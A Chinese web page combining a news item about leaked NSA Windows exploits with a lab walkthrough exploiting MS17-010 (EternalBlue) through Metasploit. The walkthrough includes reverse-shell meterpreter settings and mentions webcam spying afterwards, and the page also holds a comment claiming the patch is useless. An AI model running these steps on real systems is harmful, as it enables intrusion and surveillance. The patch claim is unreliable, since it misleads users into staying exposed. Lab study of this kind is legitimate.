前沿拓展：

微軟ms17-010補(bǔ)丁

我的情況和你一樣，重新做系統(tǒng)之后就沒(méi)事了，其實(shí)這個(gè)補(bǔ)丁裝不裝都可以！沒(méi)什么作用！

中新網(wǎng)4月20日電 近日美國(guó)國(guó)家**(NSA)的黑客武器庫(kù)遭曝光，其中有多個(gè)遠(yuǎn)程攻擊Windows系統(tǒng)的武器已在網(wǎng)上公開(kāi)，任何人都可以使用NSA的武器攻擊其他電腦。對(duì)此，360安全衛(wèi)士于4月19日晚間緊急推出“NSA武器庫(kù)免疫工具”，可一鍵檢測(cè)修復(fù)漏洞、關(guān)閉高風(fēng)險(xiǎn)服務(wù)，從而全面免疫預(yù)防NSA黑客武器。

NSA武器庫(kù)免疫工具下載地址：dl.360safe.com/nsa/nsatool.exe

NSA武器庫(kù)的公開(kāi)被稱為是網(wǎng)絡(luò)世界“核彈危機(jī)”，其中有十款影響Windows個(gè)人用戶的黑客工具，包括永恒之藍(lán)、永恒王者、永恒浪漫、永恒協(xié)作、翡翠纖維、古怪地鼠、愛(ài)斯基摩卷、文雅學(xué)者、日食之翼和尊重審查。這些工具能夠遠(yuǎn)程攻破全球約70%的Windows系統(tǒng)，無(wú)需用戶任何**作，只要聯(lián)網(wǎng)就可以入侵電腦，就像沖擊波、震蕩波等著名蠕蟲(chóng)一樣可以瞬間血洗互聯(lián)網(wǎng)，木馬黑產(chǎn)很可能改造NSA的武器攻擊普通網(wǎng)民。

據(jù)微軟官方回應(yīng)，NSA武器庫(kù)攻擊的Windows系統(tǒng)漏洞已在近期補(bǔ)丁中完成修復(fù)。但是對(duì)于Windows XP、2003等失去微軟支持的系統(tǒng)版本來(lái)說(shuō)，目前仍處于“裸奔”狀態(tài)。此外，由于漏洞影響全系列Windows版本，沒(méi)有及時(shí)安裝補(bǔ)丁的Win7、Win8甚至Win10用戶也處于危險(xiǎn)之中。

針對(duì)不同版本W(wǎng)indows用戶，360“NSA武器庫(kù)免疫工具”可以掃描系統(tǒng)環(huán)境，精準(zhǔn)檢測(cè)出NSA武器庫(kù)使用的漏洞是否已經(jīng)修復(fù)，并提示用戶安裝相應(yīng)的補(bǔ)丁。針對(duì)XP、2003等無(wú)補(bǔ)丁的系統(tǒng)版本用戶，防御工具能夠幫助用戶關(guān)閉存在高危風(fēng)險(xiǎn)的服務(wù)，從而對(duì)NSA黑客武器攻擊的系統(tǒng)漏洞徹底“免疫”。

1、EternalBlue(永恒之藍(lán))：**Bv1漏洞攻擊工具，影響全平臺(tái)，已被微軟補(bǔ)丁MS17-010修復(fù)。在微軟支持期的系統(tǒng)可使用360安全衛(wèi)士檢測(cè)修復(fù)漏洞，不在支持期的系統(tǒng)可使用360“NSA武器庫(kù)免疫工具”進(jìn)行免疫；

2、EternalChampion(永恒王者)：**Bv1漏洞攻擊工具，影響全平臺(tái)，已被微軟補(bǔ)丁MS17-010修復(fù)。在微軟支持期的系統(tǒng)可使用360安全衛(wèi)士檢測(cè)修復(fù)漏洞，不在支持期的系統(tǒng)可使用360“NSA武器庫(kù)免疫工具”進(jìn)行免疫；

3、EternalRomance(永恒浪漫)：**Bv1漏洞攻擊工具，影響全平臺(tái)，已被微軟補(bǔ)丁MS17-010修復(fù)。在微軟支持期的系統(tǒng)可使用360安全衛(wèi)士檢測(cè)修復(fù)漏洞，不在支持期的系統(tǒng)可使用360“NSA武器庫(kù)免疫工具”進(jìn)行免疫；

4、EternalSynergy(永恒協(xié)作)：**Bv3漏洞攻擊工具，影響全平臺(tái)，已被微軟補(bǔ)丁MS17-010修復(fù)。在微軟支持期的系統(tǒng)可使用360安全衛(wèi)士檢測(cè)修復(fù)漏洞，不在支持期的系統(tǒng)可使用360“NSA武器庫(kù)免疫工具”進(jìn)行免疫；

5、EmeraldThread(翡翠纖維)：**Bv1漏洞攻擊工具，影響XP和2003，已被微軟補(bǔ)丁MS10-061修復(fù)，相關(guān)系統(tǒng)用戶可使用360安全衛(wèi)士檢測(cè)修復(fù)漏洞；

6、ErraticGopher(古怪地鼠)：**B漏洞攻擊工具，影響XP和2003，無(wú)補(bǔ)丁，相關(guān)系統(tǒng)用戶可使用360“NSA武器庫(kù)免疫工具”進(jìn)行免疫；

7、EskimoRoll(愛(ài)斯基摩卷)：Kerberos漏洞攻擊工具，影響2000/2003/2008/2008 R2的域控服務(wù)器，已被微軟補(bǔ)丁MS14-068修復(fù)，相關(guān)系統(tǒng)用戶可使用360安全衛(wèi)士檢測(cè)修復(fù)漏洞；

8、EducatedScholar(文雅學(xué)者):**B漏洞攻擊工具，影響VISTA和2008，已被微軟補(bǔ)丁MS09-050修復(fù)，相關(guān)系統(tǒng)用戶可使用360安全衛(wèi)士檢測(cè)修復(fù)漏洞；

9、EclipsedWing(日食之翼)：Server netAPI漏洞攻擊工具，影響2008及之前的所有系統(tǒng)版本，已被微軟補(bǔ)丁MS08-067修復(fù)，相關(guān)系統(tǒng)用戶可使用360安全衛(wèi)士檢測(cè)修復(fù)漏洞；

10、EsteemAudit(尊重審查)：RDP漏洞遠(yuǎn)程攻擊工具，影響XP和2003，無(wú)補(bǔ)丁，相關(guān)系統(tǒng)用戶可使用360“NSA武器庫(kù)免疫工具”進(jìn)行免疫。

拓展知識(shí)：

微軟ms17-010補(bǔ)丁

（第一次在發(fā)表文章，沒(méi)啥經(jīng)驗(yàn)，分享一些學(xué)習(xí)經(jīng)驗(yàn)。大佬們多多包涵，也希望大家能夠指出我的錯(cuò)誤。）

靶機(jī)：windows7 x64  IP：192.168.1.5

攻擊機(jī)：Kali Rolling (2019.3) x64 IP：192.168.1.3

兩臺(tái)主機(jī)在同一網(wǎng)段內(nèi)；win7關(guān)閉防火墻并且開(kāi)啟445端口。

1、使用ipconfig/ifconfig分別查看win7和kali的ip。

2、打開(kāi)msf工具

每次開(kāi)啟都會(huì)有不同的界面

3、使用search命令搜索ms17_010

4、選擇模塊和設(shè)置條件

使用use來(lái)選擇第三個(gè)模塊，可以直接 use 2，也可以打全

第二用set來(lái)設(shè)置靶機(jī)IP set rhost 192.168.1.5

設(shè)置本機(jī)IP set lhost 192.168.1.3

設(shè)置**端口 set lport 8888 不設(shè)置則默認(rèn)4444端口

設(shè)置payload set payload windows/x64/meterpreter/reverse_tcp

還有另外一個(gè)payload能用于本實(shí)驗(yàn)，具體可以 show payloads 查看

最后，可以使用show options檢查所有信息

5、開(kāi)始滲透 run

稍等片刻 看到win則成功創(chuàng)建會(huì)話

6、成功之后，可以開(kāi)啟Windows7的攝像頭，截圖等等

具體可以用help查看

1、關(guān)閉445端口

2、打開(kāi)防火墻，安裝安全軟件

3、安裝對(duì)應(yīng)補(bǔ)丁，這里就不放鏈接了

關(guān)閉445端口的方法：

1）打開(kāi)控制面板—-Windows防火墻—-高級(jí)設(shè)置

2）點(diǎn)擊新建規(guī)則，設(shè)置端口號(hào)的規(guī)則并且命名（如圖）

msf工具雖然強(qiáng)大，但只能用于已知的并且已提交模塊的漏洞。要理解漏洞原理，理解如何使用漏洞，甚至自己挖洞才能做到真正的去攻擊。而不是簡(jiǎn)單的使用工具use和set。